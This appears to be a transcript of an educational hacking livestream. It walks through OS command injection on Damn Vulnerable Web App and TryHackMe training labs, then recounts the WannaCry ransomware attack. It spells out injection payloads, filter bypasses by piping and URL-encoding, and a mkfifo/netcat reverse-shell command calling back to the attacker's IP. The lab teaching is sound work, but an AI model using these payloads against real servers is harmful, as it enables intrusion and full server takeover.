everybody, and welcome. This is the Shy Hat, that's me, and we are HackerFrogs. So everybody, today what we're going to be doing is we're going to be practicing some web app hacking basics. So what we did on Monday is we learned about some web app hacking techniques. Specifically, we learned about OS command injection. And that's going to be the first hour of the stream. And in the second hour, we're going to be taking a look at some hacking history. So we're going to take a look at a couple of big hacks that happened before. And the first hack we're going to be looking at in hacking history is covering let's bring it up on Wikipedia. This one is called the WannaCry ransomware attack. And this is a ransomware attack that happened in May of 2017. So it seems like a really long time ago, but it hasn't been a decade yet, quite. But that was a really big problem that happened way back then, and it actually I think it's going to be a very interesting story to talk about, and we're also going to be talking about another historical virus. In this case, it is the slammer worm, and also called SQL Slammer. We're going to be talking a little bit about this and noting what is important about this particular virus and its place in cybersecurity history. But aside from that, let's start our first topic of the day, and that's going to be this right here. We're going to be talking about what we covered in the Monday workshop, and we talked about reverse operations. This was part of our code analysis portion of the workshop. As well, we talked about OS command injection over here. So OS operating system command injection is a web app vulnerability where arbitrary OS commands can be performed on the web server through a web interface. OS command injection is a serious vulnerability and can often lead to complete compromise of the web server, and if so, the web server can be used as a foothold to attack other machines on the network. So today we're going to be demonstrating some web server compromise, and we're going to be demonstrating how these machines, after being taken over, can be used to attack other machines on the network. We won't be going through with the actual attack, but we will be gaining a foothold on the web server to show how such pivoting can be done. All right, so today we're going to be going through some exercises on the damn vulnerable web app, which is located right here and is available on the Try Hack Me platform. So to anybody who's following along, you can access the DVWA, Damn Vulnerable Web App, from this link on tryhackme.com. And after arriving here, you can start up your attacking machine over here. So there's going to be a button over here called Start Attack Box. You can click on that, and under task 1 in this room, you can click on the Start Machine button over here as well. And that's going to start up the virtual machine that is associated with this particular module. So that's so starting up both of these machines is going to take maybe somewhere in the neighborhood of 2 minutes to start up. But we're just going to have to be patient. So while we're waiting, I'd like to remind everybody that we have a Reddit page, and it is reddit.com/hackerfrogs. I'll provide the link to everybody over there. And over here, we have a schedule for all of our streaming, so all of our live streams over here. Each week, that link is going to be posted. The topic is going to be posted rather, and we can see that we're following the schedule here. It is July 24th, and we're doing this stream right now. And our primary topic is we're talking about OS command injection, and our secondary topic we're going to be looking at hacking history. looking at the WannaCry ransomware attack and the Slammer worm. Okay, so as well, we have a YouTube channel. So over at the ShineHat YouTube channel, which is located over here. To anybody who's looking in the chat, you can find it over here. You can see that we are live. That's us. As well, you can take a look at all of the, well, we have some shorts over here, and in our shorts, we talk about a few different concepts in cybersecurity. And you also get to look at our lovely birds in the backyard cyber birds, I would like to call them. And as well, you can take a look at previous live streams as well. If you missed any and you want to catch up on those, you can find them over on the YouTube channel. So let's go back to the Damn Vulnerable web app, and we'll see that we are nearly done initializing our machine. Okay, so once we finish initializing our attack box machine on TryHackMe, we definitely want to put this in its own window, and we can do that by clicking on this button right over here. It's labeled View in Full Screen. We can click on that, and that's going to put the attack box virtual machine in its own browser tab. And I'm going to turn on my mouse highlight so you guys can better see where my mouse is when I'm walking through these exercises. Okay, so now we have the attacking machine on its own browser tab, and we can go back to the original web page, and we can close off this browser pane by clicking on this button right here, Exit Split View, and now our interfaces are much cleaner. All right, so to access this machine online, we can click on this button right here, which has the target IP address. So click on that, and then go over to the attack box virtual machine, and then click on any one of these browser shortcuts. So there's one over here, and there's one over here. So we just need to click on that, and then we're going to open up the web browser on our attacking machine. By the way, if anybody is lost and needs some of the links for the practice machines or the practice exercises that we're doing, please let us know in chat, and we'll provide the links to everybody in chat. Okay, so this is the virtual machine that was spun up for us. I'm going to put a HTTP in front of it, and then we are at the DVWA, the Damn Vulnerable web app. So to anybody who just arrived, we're working on this room over at TryHackMe right now, and we're going to be working through the OS command injection exercises in this room. Okay, so the admin username and the password is password over here. Let's log into the machine. So username is going to be admin, and the password is going to be password. Okay, so after that's done, we click on login, and we'll be logged into the application. Okay, so let me make this a little bit larger for us to take a look at. All right, so the DVWA, which is the Damn Vulnerable Web Application, this is a platform for learning about web app vulnerabilities, and it also lets us practice some of these vulnerabilities. So it's a great tool for learning about some different attacks and exploits. Okay, so you can see on the side panel over here, we've got our instructions, we've got our setup, we've got our and a bunch of different attacks we can practice over here. So we could practice brute force, command injection, file inclusion, insecure capture, lots of different attacks. But the first thing we want to do after we've arrived at this, after we've logged into this application, is we want to adjust the DVWA security. So it's going to be on the left-hand side on the menu bar, and it's going to be most of the way down. And you want to click on that, that's going to bring you to an endpoint called security.php. So the thing about the DVWA is if we don't change the security level in the application, we're not going to be able to do any of the exercises. So the security level over here, it says that the security level is currently set to impossible. So impossible means that there is no vulnerability exploit. So you can set the security level to low, medium, high, or impossible. The security level changes the vulnerability level of the DVWA. And so you just need to know that low is very easy to exploit and impossible is impossible to exploit. So we just need to click on this drop down over here. From impossible, we'll set it to low. Okay, and after we've done that, we need to click on submit. And then that's going to set the security to low inside the application. Okay, so let's move on to our first exercise. And from here, we can click on this page over here, which is called command injection. So, okay, so here we are on the command injection page. So let me just pull up my notes and see what's going on. So we're doing ExtraCredit 3, okay. All right, so we've got this, this function over here inside the web app. It's called ping a device. So ping a device, it says here in the description, enter an IP address. So we can select an IP address. So for example, we could select home, which is 127.0.0.1. And then we can submit this. And then it shows us some output over here. So ping 127.0.0.1, and it sends a bunch of ping packets over to this IP address. And it says 4 packets transmitted, 4 received, 0% packet loss. Okay. So this is a typical output for a Linux command, which is also ping. We could also take a look at, so ping is also available on Windows machines. If you were to go down to here and punch in CMD and bring up our command prompt, then we would be able to give our own ping command over here. So we could give ping 8.8.8.8. And this is the IP address for a Google DNS server, I do believe. So if we were to give this, it's going to give us a very similar output over here. And it's not exactly the same as what we see in the web app, but it's very similar. So we can tell by the output from the web app here that this might be utilizing an OS command. And we might be seeing something that's a command that's running from the web server itself. And that means we could try to test this application for OS command injection. So if you remember from last time, we were taking a look at the Natus CTF application. I think it was Natus level 8, or is it Natus level 9? It might have been Natus level 9. And in Natus level 9, we were able to bypass this field over here to get OS command injection by doing the following. So we did a semicolon, and then the semicolon over here is going to interrupt whatever command is being sent by the application. And then we can put in our own command, for example, who am I? And then after who am I, after whatever command we want to do, we can send this hash symbol over here, which is going to comment out whatever other part of the command was going to be run. And after that, so this is a very simple example of a OS command injection payload. And we click on submit. And after we click on submit, we get this output over here, which is www-data. And that is typically a user that is associated with a web application that is running on a Linux server, on a Linux web server rather. So this confirms that we have OS command injection, but if we really wanted to, we could do another command instead, and whatever command we want to do, whatever Linux command we want to do, we can just put it between the semicolon and the hash symbol over here. So for example, we could read the password file, the etc password file, and let's see if this works. So we can submit this, and then we see all of the user accounts on the web server. And this, well, if we didn't think that we had OS command injection before, we definitely know that we have it now. Okay, so now that we have OS command injection, we can say that we've solved this particular exercise. But just for fun, what we're going to do is we're going to try to get a reverse shell on the web server. So in order to get a reverse shell on the web server, what we can do is we can we can minimize our web browser right there, and we're going to open up a terminal. So we're going to open up a terminal, and in the terminal we're going to set up a netcat listener. So the netcat listener is what is listening for the reverse shell connection that we're going to try to force the web server to send. So before that, what we're going to do is we're going to get our IP address. Actually, no, wait, we have our IP address. So on the attack box, your machine's IP address is actually the name of the system. So in my case, it's 10.10.36.140, but in your case, it's going to be something else. So we need to keep track of this attacker IP address for when we send the reverse shell command to the web server. So in order to set up our reverse shell listener, we do nc for netcat, and netcat is the program we're going to use to set up the reverse shell listener. And then we're going to do dash nlvp, and this string of flags is going to do no DNS lookup, and it's going to listen, and it's going to send verbose output, and then it's going to ask for a port number, and the port number in this case is going to be 443. Just a second, I've got some cats outside, and they're making some noise, and I need to make them go away. Hold on. Okay, so sorry about that interruption, but I didn't want those cats to cause too much of a disturbance. So anybody, if you're in chat, you can always give us your favorite cat emote. I like this cat emote, but sometimes some people think that that this kind of looks like a cat face as well, and also this one. All right, so so enough catting around. Let's start up this reverse shell listener. So it's netcat -nlvp and then 443. So 443 as the port number is used because most web servers don't block 443, which is the HTTPS port in their firewall deny list. Okay, so let's run that. So we have a listening netcat. We have a netcat listener listening on our port 443. And now we're going to go over to the web application. So from the web application that is running the damn vulnerable web app, we're going to do we're going to give this particular netcat command. This is another netcat command, but first we're going to put our OS command injection payload over here, which is just this, and then we're going to do rm/tmpf, and then we're going to end that command, and then we're going to mkfifo, and that's going to create a pipe, I do believe. and we're going to create it in the temp directory in this file, and then we're going to end that command, and then we're going to cat out that particular pipe, tmp f, and then we're going to pipe that into bin sh, and then we're going to bin sh in interactive mode, and then we're going to do 2 greater than and 1, and that is for standard input and output, and we're going to pipe that into netcat, and we're going with this netcat command, we're going to send our attacker machine IP address. So in my case, it's going to be 10.10.36.140, and then we're going to do a space and supply the port, which is 443, and we're going to put the output into the pipe, which is at /tmp/f. Okay, so if anybody wants this full command over here, I'm going to provide it in chat. The only thing in this case is that we need to, make sure that the IP address is changed out for your attacking machine IP address. Okay, so after we've completed crafting our reverse shell payload over here, okay, we're going to send off the command, and this makes the web application hang for a little bit. So let's take a look at our reverse shell to see if it was picked up. Okay, so it's still listening. Okay, so it says it's still listening here, so it I guess it didn't work. Let me try that again. Okay, so let's take a look at. I'm gonna look at my command again and see if I made any typos. mkfifo. Okay, temp cat f, and then cat tmp f into bin /sh I, and then okay, and then netcat. Oh no, I gave the wrong IP address. Okay, so it was a 3.6 instead of a 2.6. Okay, so I made a typo there. Okay, so I take a look at the port. The port is fine, and I'm going to submit this again. Okay, so the web application hangs, and it continues to hang, which is a good sign. Okay, so we look at our reverse shell listener, and we've seem to have received the connection from the web server. Okay, it says here that we received a connection from this IP address right here on this port, and it says we can't access teletype, the terminal rather. It says job control turned off. That is fine, and then we see that we are a regular user right now. We ask who am I? We are www data, and that is fine. And we've hacked the thing, okay? And I have a new redeem on my channel, and this is going to play the first couple bars from All the Things by Dual Core, which is a widely regarded as the hacker anthem. So it's All the Things. I'm redeeming that. Oh, it should be All the Things with an S. And before I do that, I just need to change something. I just need to adjust something. Okay, I'm going to send it from my Twitch over here. Okay, so we've hacked the thing, and we have our connection over here. So there's not too much we can do with with this connection over here. There's no real privilege escalation on this particular box, but we can see that we could probably take a look at all the different stuff inside of the web app, and we can see all the different directories that are associated with the different challenges on this web app. Okay, so we're done here, so we're going to exit. All right, and now we're going to move on to the more difficult version of this exercise. And the way that we do that is we're going to go back, and then we're going to go back to the DVWA security page. So over here, the security level is currently set to low. Instead of setting it to low, we're now going to set it to medium. So in the dropdown, we set it from low to medium, and then we click on submit. And now the exercise should be more difficult when we do the exercise for OS command injection. So let's go back to the command injection page, which is over here. So an interesting thing about the DVWA application is that you can take a look at the code that was used to create these web pages. Down at the bottom over here, there's a button over here labeled View Source, which you can click on, and this is going to show you the code that was used to create the page. So we see here, if it's at post submit, then target equals this variable right here, request IP, and then in this case, they're creating a blacklist. So blacklist meaning deny list rather, so we're not allowed to use any of these characters right over here. So in this case, we're not allowed to use the following characters in the submit field, which is the double ampersand sign over here, which is used to do command 1 and command 2, and we're not allowed to use this character either, which is the semicolon. The semicolon character is going to end the command, and we were using these characters over here. Well, we were only using this character right here to do our last payload, so we can't use this character for our current payload. Okay, and it says over here, this is the part of the code that removes any of the characters in the array that were blacklisted, and this is going to be a string replace function over here, and otherwise it's going to run this command over here, which is ping 4 times, ping -c 4, and then target. The target is whatever the IP address we set for the ping. All right, so now that we know that we have these restrictions, we can't use these characters, and we can't use this character. Let's try to solve the exercise again. Okay, so we're going to close that out, and then we're going to go over here, and we're going to try the same thing as last time. So we're going to do this, and we're going to include our comment out, and we're going to do who am I, and we're going to submit, and it is not going to work. So let's take a look at some at a working user input, which is, let's try 8.8.8.8 and see if it can communicate with that server. So I don't think this machine can communicate with the internet. So 4 packets transmitted, 0 received, 100% packet loss. Right, so it seems that this particular web server can't communicate over the internet. So, but it should be able to communicate with our attacker machine. So if we ask it to contact our attacker machine, so 10.10.36.36, 36.140, and we click on submit, then we should be able to communicate with our machine, our attacker machine. So yeah, so it received the 4 packets, 0% packet loss, so that's fine. Okay, so how do we get around this this particular filter? So what we can do is we can use the pipe. So we can use this pipe right here. The pipe character is going to let us put the output of one command to the input of another. So let's try pipe and then who am I? And then we'll comment out with this. We click on submit. And we get our feedback over here, www.data, and that's just fine. All right, so we managed to get OS command injection on the medium difficulty over here, but can we get our reverse shell with this under this setup? So let's try getting the reverse shell. So first of all, we need to set up the listener again. So I'm going to clear here, and we're going to set up the listener again with this command, and then we're going to go back to the web app, and let's see if we can get the reverse shell command to work. So if you recall, the reverse shell command was this right here. Let me copy. So I just I provided it in the chat. And what's interesting about this is that your antivirus might actually pick up this particular string, because this is used to establish reverse shell connections. It can be used to establish a reverse shell connection in a lot of different circumstances. So that's why some antiviruses pick this up as malicious. Okay, so I'm going to paste in my command over here, and let me get rid of. So I'm going to fix the command. And then I'm going to supply this. So I get the feeling that this isn't going to work because we're not allowed to use this character right here. So this character right here is a semicolon, and we use the semicolon quite a bit in our command. So I get the feeling this isn't going to work, but I'm going to try and see if it works anyways. So this seems to hang. So maybe it worked. Okay, it doesn't seem to have worked. It doesn't seem to have worked. Okay, so but it is hanging. So what could we do? So another thing we could do to try to work around this this particular filter is we could try to URL encode all of our special characters. So by URL encoding the characters, we effectively change the output. We change the input of whatever malicious string we're putting in, and that means that it might not be detected by the web app filter. So I'm going to change the payload back to what it was originally, and then I'm going to copy this, and I'm going to search for something that'll do some URL encoding. So URL encoder. Okay, we have something over here. I'm just going to click on this, paste in my payload over here, and then I'm going to click on encode. So click on encode, and this is going to give us a URL friendly version of the string. So all of the special characters in the payload have been translated into URL encoding. And let's see if the application will accept this. So we're over here. Okay, and I'm going to delete this and paste in this. Okay, so let's see if this payload works. If the payload works, then we're going to see a connection from our reverse shell. So we click on submit, and the system hangs again. Maybe that's a good sign. And we're still listening over here. So it appears that we can't get the reverse shell on this particular difficulty. Okay, so all right, so we're gonna. I guess we can give up on this, but we were able to get OS command injection on the medium level. So that's kind of a win. All right, so at this point we're gonna play another redeem, and I guess we can redeem. Go to hack. Okay. So this is from South Park, the original episode. It's my HackerFrogs version of it.
Mr. Hat, may I please be excused from class?
Well, Kyle.
Yes.
You hear me? You go to
Hack.
You go to
Hack.
You
Have a great day. All right. So I hope everybody else is having a great day as well.
Mr.
Okay.
Hat, may I please be excused from class?
Plays
Well,
twice.
Kyle.
Yes.
You hear me? You go to
Hack.
You go to
Hack.
You
Have a great day. Okay. I should really only put that in the Twitch chat or the YouTube chat, and then it's not going to play twice. Okay, so let's move on to the hard version of this exercise. So we can go back down to DVWA security, click on that, and then it looks like the application is frozen. So I'm going to reload the application. So it seems like our application is bugging a little bit. I'm going to put the application in a new tab. Hopefully that helps things. Or did the entire web server go down? Okay, so I'm going to restart the virtual machine because it looks like the let me try pinging the machine. Hold on. So over on this page, I'm going to get the IP address, and then I'm going to go back to my attack box, and I'm going to send a ping to this IP address with a 4 count, and we'll see if we can communicate with it. So we can communicate with it, but it looks like the web page might be, or the web server might be kind of unstable right now. All right, so what I'm going to do is I'm going to restart the machine. So I'm going to get out of here, and then I'm going to go back over here, and I'm going to terminate this machine, and then I'm going to restart the machine. So I'm going to start the machine again, and we're probably going to have to wait another minute or so for this to fully initialize. And then hopefully we can try the exercise again. All right, so let's go back to the YouTube page over here. So this is the Shy Hat YouTube page, and we can enjoy. So to everybody who hasn't been subscribed to the channel for too long, we're also doing our series of Hack the Box starting point machines. So if you're interested in learning with Hack the Box, we've got all the starting point machines as walkthroughs over here. We've been making all these different videos over the last few months, and we also included a section on how to connect to Hack the Box using OpenVPN, because you definitely want to connect to Hack the Box using a VPN if you want to learn with them. because using their own machine is a little bit tricky, especially if you run out of time and then you're not able to do so. We also have a video on how to install VirtualBox and Kali Linux on your Windows machine. If anybody's interested in that, I'm going to leave a link to that in the chat. And in that time, TryHackMe should have initialized the web server again. So just a few seconds more. Okay, so we're back in business. So let's go back to the machine and then open up our web browser again. And then we will access the machine. We need to log in again. Admin password. And then we can go back over to DVWA security, and we're going to set this one to high now. Okay, so this is the high security version of the exercise. We're going to go back to command injection. And we have the same, it's the same interface again. We need to ping a device. So let's enter an IP address. So we'll send our IP address, so it's 10.10.36.140. Why do I keep on making this typo? Okay, so let's submit that. So we get our ping packets back, so we're able to communicate with our attacker machine. And let's take a look at what's different inside of the source code. So at the bottom of the web page, we can click on this right here, which is view source. So we can see the code that is used to create this page. So right here it says it has a new deny list over here, and deny list includes the ampersand character, the semicolon, the pipe character, the dash, the $, these two brackets right here, the backtick, and the double pipe over here. So obviously this is going to be very tricky as far as how we're going to evade all of this. And what it does is, if there's any of these characters in the array, we're going to run the string replace function on it, and we're going to get rid of all this stuff. Okay? All right, so let's go back. So we're going to close this out, and so in order to bypass this this deny list over here, we're going to use an unusual method. Is we're going to combine this pipe right here with whatever command we want to. In this case, it's who am I. We need to stick this together, and we need to make sure that this is we need to stick this together and make sure there are no spaces between here. And in that way, we're able to access the we're able to execute the OS command injection. So we're going to click on submit, and we get the result www data. I'm not too sure why this this particular bypass works, but after some experimentation, that is the method that works in this case. So we could try using the pipe, and then we could try our big reverse shell command over here. So, but the reverse shell command includes all sorts of different illegal characters over here. So, so could we get this to work? I'm not sure if we could actually get this to work. We could try to encode this again, and that might work or it might not. But I'm not completely sure, but let's try it. So instead of these spaces, we're going to use the plus symbol, and this might work to put all these commands together. Or it might completely fall on its face. I'm not really expecting too much. Okay, so let's try submitting this. And yeah, in this case, it's going to get picked up by the deny list. And another thing is that we didn't set up the reverse shell listener anyways. So let's try the same thing, but let's URL encode this. So I'm going to copy this, and we're going to go over to the URL encode website. And I'm going to fix this a little bit. So what was our IP address again? So it's 10.10.36.140. 36.140. Okay, so this is, we're going to URL encode this, and then we're going to send this as the command over here. Okay, so this was also caught by the filter. So we can say that this is probably not the way we want to do this. Okay, but we did manage to get OS command injection on this level of the exercise, so we can call this a win. All right, so let's redeem our frog song. So this is a fun little sound effect I found online. It kind of sounds like frogs croaking, but you be the judge of this. All right, so let's move on to our last exercise of the day. And this is also going to be a try hack me exercise, but it's not going to be with the damn vulnerable web app. Instead, it's going to be with the advent of cyber. So this is a Christmas event that happens on Try Hack Me every year for Christmas. And if you want to join along, you can go to the following URL over here. And seeing as how we're already on Try Hack Me, all we need to do is go back to our DBWA room, and we need to terminate our machine over here. So we click on terminate, and then go over to the advent of cyber room and go over to task 24. So task 24, otherwise known as day 19, this is another exercise where we're dealing with OS command injection. So what we need to do is you need to go over to the link and then open up task 24, and at task 24, you need to click on Start Machine. So click on the Start Machine. Oh, sorry about that. Just my chair clicking and clacking. Okay. So this one here, it says access the web server on this IP address. So HTTP, your IP address, and then port 3000. So we're going to go up here, and over here, Christmas command injection. This is the name of the machine. We need to wait for about a minute for this to show up again. This split screen is for your attack box. So if you already have your attack box online, you can go ahead and just click on Exit Split View over here. So that gets us out of the split view. And now we have an IP address. So after the machine finishes spinning up, the title should be Christmas command injection over here. And we want to copy this IP address. So we can copy this to the clipboard and then go to the attack box. Oh, this looks all messed up. I'm going to reload this. And then inside the web browser, I'm going to paste in the IP address. I'm going to fix this with HTTP. And then at the end, we're going to put :3000. And a special thing for this particular exercise is if we go over to the task description over here for task 24, another day, another hack from the Christmas monster. Can you get back control of the system? Access the server on this IP address at this port. And it says that McSkitty, which is the character associated with the Christmas exercises, actually found something interesting on the /API/CMD endpoint. So we can use this endpoint with our attack box in order to access the vulnerable endpoint. So it's going to look a lot like this. So everybody, I'm going to supply this this URL to everybody in the chat, just in case you're following along. Of course, what you need to do is you need to replace the IP address in there with the IP address that was created with your own, when you spun up your own machine. Okay, and we're going to go to that endpoint, and then the message that we get when we arrive at that endpoint is cannot get /API/CMD. So this is an error message over here. So we know that this is a OS command injection exercise. So what we can do is at the end, after the CMD, we can supply our own command after we put another slash to indicate another directory. So I'm going to do ls, or maybe we can do who am I. So who am I, and then we're going to submit this URL, and then we get this API response. So inside of the API response, this is a JSON Java something object notation, and we receive this output over here. So in standard out, we receive root. So we're root. So this is so this particular API endpoint is running as the root user on the web server, which is bad news for security, but good news for us. All right, so we can see this is the pattern. So it's this, whatever it is, this endpoint over here, but at the very end we supply our own command. Okay, so this is who am I, but what would it look like if we wanted to do ls-la? So I think we can still supply this. So ls-la is going to give us the directory list for the current directory, and we get to see, well, the format is kind of screwed up. But I think we can clean up this output by looking at the page source. If we go to view page source, oh no, this is even worse. This is even worse. Okay, so we definitely don't want to look at the page source for this. But I guess if we wanted to inspect this very closely, we see that we do have OS command injection available on the machine. So let's try to get a reverse shell on the system then. So if we wanted to get a reverse shell on the system, we could use a payload that is similar to this one that I'm supplying in chat. So we would have to paste this to the end of the URL over here. Oh, this is the wrong one. Hold on. Let me copy this again. Sometimes the clipboard for these virtual machines is a little bit screwed up, but okay. So if I try this is what I need to do here is I need to supply a port and a attacker IP. So in this case, I'm going to supply 443 as the port, and for the attacker IP, I'm going to supply my own attacker IP, which is 10.10.36.140. Okay, and then I need to set up my reverse shell listener. So I think my reverse shell listener is already set up right now. So I'm listening on this port. Okay. And we're going to go over to the web app, and we're going to try to send this command over here. And it says cannot get this over here. So what is the problem here? Well, the problem here is this particular character right here, this slash. And the problem is because we're including slashes as part of our payload, the web application is interpreting the slashes as a URL, and that's going to cause errors. So the solution to this is we need to URL encode this entire string so it doesn't include any of these special characters, specifically these forward slashes over here. So what we can do is just copy the reverse shell payload, and then we can go over to our URL encoder, and in our URL encoder we can paste in our payload, our reverse shell payload, and then click on encode here, and that's going to give us our URL encoded payload. I'll provide the payload in the URL encoded form over here for everybody. What you need to do is you need to replace your attacker IP address for this particular command to work. Okay, and then inside of the web application over here, we can paste in the URL encoded string, payload string, and then we're going to send that, and that's going to cause the web application to hang, and that's a good sign. So after that, we see in our reverse shell listener, we received a connection from the web server over here, but we have no job control in the shell. We are root, so I guess we can redeem the I'm root redeem.
What are you?
I'm system root.
All right, so we can search for, we're searching for a specific file in this web server. So which file are we looking for? We're looking for the contents of the user.txt file. So in order to find the users.txt file, all we need to do is use a find command. So find /-name user.txt and then two /dev/null. And this is going to find us the file in the file system. So we're just going to wait a little bit, and we find the user.txt file in this directory right here, /home/bestadmin. Okay, so let's cat that file out. Copy this and then paste in the path, and then run this command. Okay, and we have the flag right here, and copy the flag, and we'll supply this as the answer to the question, and we're finished the exercise. Right over here, what are the contents of the user.txt file? We're going to paste this in, and we're going to click on submit. And we're done. All right, everybody. Well, I hope you had fun exploring OS command injection with the Dan Vulnerable web app, as well as the Advent of Cyber room over at tryhackme.com. And so if you want to learn more web app security stuff, we're going to be resuming with our schedule and next week on Monday. So on Monday, we're going to be doing our web app hacking basics number 4. And on Monday, what we're going to be doing is we're going to be going through the SQL murder mystery. So SQL is a language that databases use, and and these databases are connected to a lot of different web applications. So let's do a quick search for the SQL murder mystery. It's located over here, and we're going to be covering this on Monday. So the SQL murder mystery is what we're going to be doing is we're going to be searching through the database using and learning how to use the database commands in order to solve a mystery. So this is what we're going to be covering on Monday, but we're going to be switching topics now. And because we're switching topics, we're going to be changing up our overlays, and we're going to be turning on some music. So I'm going to start the music. Okay, that's much better. So the music isn't supposed to be super loud. It's just going to be, it just has to be there. And we're going to change topics from HackerFrogs ExtraCredit, and we're going to go into hacking history. So we're looking at WannaCry, and we're looking at the Slammer worm. Okay, and that is done. Oh, this is way too big. It sort of fits. Okay, and this is hacking history. Okay, so this is a bit short. So, I'm gonna add more exclamation points. That makes it better. Okay, awesome. All right, so for this exercise, we're going to be looking at 2 different historical hacks. And you can find these historical hacks over at the HackerFrogs GitHub. We're going to be editing a file, and that file is going to contain all of the research that we're going to be doing today. So let's see. So this is for hacking history, and our first target is going to be WannaCry. So this is the file we have for WannaCry. So if anybody wants to know exactly where our research goes after we finish with it, it goes to this particular GitHub. And we're going to be answering the following questions about WannaCry, this event. What happened? When was the hack discovered? How long do we think the hackers were operating before the hack was discovered? Who was the target of the hack? How was the target initially compromised? What other hacking methods were employed? What was the impact of the hack? Was the hacker identified? How confident are we of attribution? Was the hacker punished? If so, how? What is this hacker doing now? Did they engage in other known hacks? What was the response to the hack? What makes this hack famous? And what lessons were learned? So we answer all of these questions when we do hacking history. And so let's start our research. So we do So just for the sake of convenience, we use publicly available research methods, which is to say we use Google and we use Wikipedia and we use LLM models like ChatGPT or, oh, what is it called? Claude. So chatbots like that. And this is what we use for research. So for the most part, these are sufficient, especially if we can get 2 or 3 of these sources to cooperate with each other. So let's find out what happened with WannaCry. So from Wikipedia, this is the WannaCry ransomware attack. So let's make this a little smaller so it looks a little better on the screen. Okay, so I'm going to read out the blurb over here. So the WannaCry ransomware attack was a worldwide cyber attack in May 2017 by the WannaCry ransomware crypto worm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency. It was propagated by using Eternal Blue, an exploit developed by the United States National Security Agency, NSA, for Windows systems. Eternal Blue was stolen and leaked by a group called the Shadow Brokers a month prior to the attack. While Microsoft had released patches previous to close the exploit, much of WannaCry's spread was from organizations that had not applied these or were using older Windows systems that were past their end of life. These patches were imperative to cybersecurity, but many app organizations did not apply them, setting a need for 24/7 operation. The risk of formerly working applications breaking because of the changes, lack of personnel or time to install them, or other reasons. Okay, so this WannaCry attack infected and encrypted the data on a lot of different computer systems because the designers of this particular worm were using an exploit, Eternal Blue, which was developed by the NSA and was leaked out by a group called the Shadow Brokers, who had supposedly broken into the NSA and stolen some of these exploits and other tools. So this is all very interconnected. And in fact, if you want to know more about the WannaCry ransomware attack, there's a great series on Darknet Diaries, which talked all about WannaCry, the Shadow Brokers, and Eternal Blue. And you can find it over at Darknet Diaries, darknetdiaries.net. Oh, this is not it. Hold on. Let's search properly. Darknet Diaries. It's not darknetdiaries.net, it's darknetdiaries.com. Okay, so if we were to search over here, we could search for WannaCry. So I'll leave the link to the podcast over here, but let's do our own research for right now. Okay, so where were we? So I'm going to clean up my tabs a little bit because they're getting a bit unwieldy. Okay, I'm going to edit the file. So this was May, right? May 2017. So what happened? In May 2017, a crypto worm called WannaCry was unleashed on the internet and targeted systems that had not applied a particular security patch that was this particular security patch for Windows that had released the previous month. Okay, so the worm was a ransomware virus that encrypted all of the data on affected systems. All the data on affected systems and demanded payment in Bitcoin to decrypt the files. Okay? Alright, so how was the hack discovered? So I get the feeling that the hack was discovered quite easily because there was an infamous screen that appeared when WannaCry encrypted files. So we could search for Google for WannaCry ransomware, and if we were to look, okay, let's look for this. And this was the screen that people saw. So I think we can make this bigger. Let's see, let's visit the website and let's put this in its own tab. So let's make this nice and big. Okay, so this is what people saw when their files were encrypted by WannaCry. So payment will be raised on this time. Your files will be lost. So so over here it implies that if you do not send the ransom in a number of days, I think so something like 6 days. It gives you. I'm pretty sure it gives you about a week. So it says if you don't pay in 7 days, you won't be able to recover your files forever. We will have free events for users who are poor, so they couldn't pay in 6 months. Interesting. So I never really took a very close look at the. I know about this particular screen, but I didn't take a look at the details of the screen until now. But it actually tells the people what happened to their computer. So your important files are encrypted. Many of your documents, photos, and videos databases are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service. So the ransomware over here wants people to send $300 worth of Bitcoin to this address. So they give a Bitcoin address over here, and then supposedly if after you make your Bitcoin payment, then they're going to send you the key to decrypt your files. But the problem is, well, we'll talk about the problem later. Okay, so where were we? So when was the hack discovered? All right, so let's take a look over here. Wow, I need to make this smaller. Okay, so the attack began on at 0700 I don't know how to read this. So I think it's 7:44 UTC on the 12th of May 2017, and was halted a few hours later at. Oh wow! So the attack began on this date, but it stopped not very long after. Okay, so it started at 7 and it stopped at 3 o'clock. So 7 o'clock it started, 7:44 it started, and it stopped over here by the registration of the kill switch discovered by Marcus Hutchins. So we'll talk about Marcus Hutchins, the person who found the solution to the WannaCry ransomware attack. We'll talk about him in a little bit, but this timeline is crazy. Okay, so I'm going to copy this much of the text, and I'm going to go back to the document. So the attack began at and was halted a few hours later at. So this was, how many hours is this? So 8, 15 minus 8 is 7. So about 7 hours. So so this particular attack was only infecting machines for about 7 hours. That's very interesting. Okay, so the next question we're going to answer is, how long do we think the hackers are operating before the hack was discovered? So in this case, the hackers were not operating before the hack was discovered. So that's, who is the target of the hack? So the target of the hack in this case was anyone who had not applied the security patch issued by Microsoft. So the interesting thing about, I think that the WannaCry worm was, it basically scanned the internet and was looking for any Windows system that had their SMB ports open, because I think that's the way the exploit was able to communicate with the vulnerable systems. But you know what? I'm gonna check. So I'm gonna check with LLM Arena, and LLM Arena is a great little chatbot arena. Okay. So this is a great little website over here that lets you check for answers on multiple chatbots at the same time. So I'm going to do Arena side by side, and if anybody wants to take a look at this particular service, you can over here. So right here I've got two models to compare. I've got Claude Sonnet over here, and I've got ChatGPT 4.0, and we're going to compare their answers. So in this case, I'm going to ask the question, how was the target initially compromised? What other hacking methods were employed? Okay. I'm going to copy this question, and I'm going to supply it to the chat. Regarding the WannaCry ransomware attack, how were the targets initially compromised? What other hacking methods were employed? Okay, we're going to send this question. Okay, so Claude Sonnet says that the primary method of initial compromise for WannaCry was through the exploitation of a vulnerability in Microsoft's server message block SMB protocol. This vulnerability, known as Eternal Blue, was particularly dangerous because it allowed for remote code execution without user interaction. Okay, so I think ChatGPT says the same thing. So, exploitation of Eternal Blue vulnerability. So the vulnerability allows remote code execution if an attacker sends specifically crafted messages to a Microsoft SMB server message block 1.0 server. So the interesting thing about Windows servers that run SMB is that they often run SMB, like previous versions of SMB, for the sake of compatibility with older computers that might not be running the updated version of SMB, and that's why a lot of systems are still running server message block SMB version 1.0, and this also leaves them vulnerable to different exploits that rely on the older protocol. Okay. So it used Eternal Blue for initial compromise, and then for propagation. Once the system was infected, WannaCry used the Eternal Blue exploit to spread rapidly to other vulnerable systems on the same network. This worm-like behavior allowed it to propagate quickly across organizations and even to other networks. So there are other hacking methods involved as well. Double pulsar backdoor. In addition to Eternal Blue, WannaCry also utilized another NSA developed tool called Double Pulsar. This backdoor was often installed using the Eternal Blue exploit and provided a way for the attackers to gain access to infected systems. 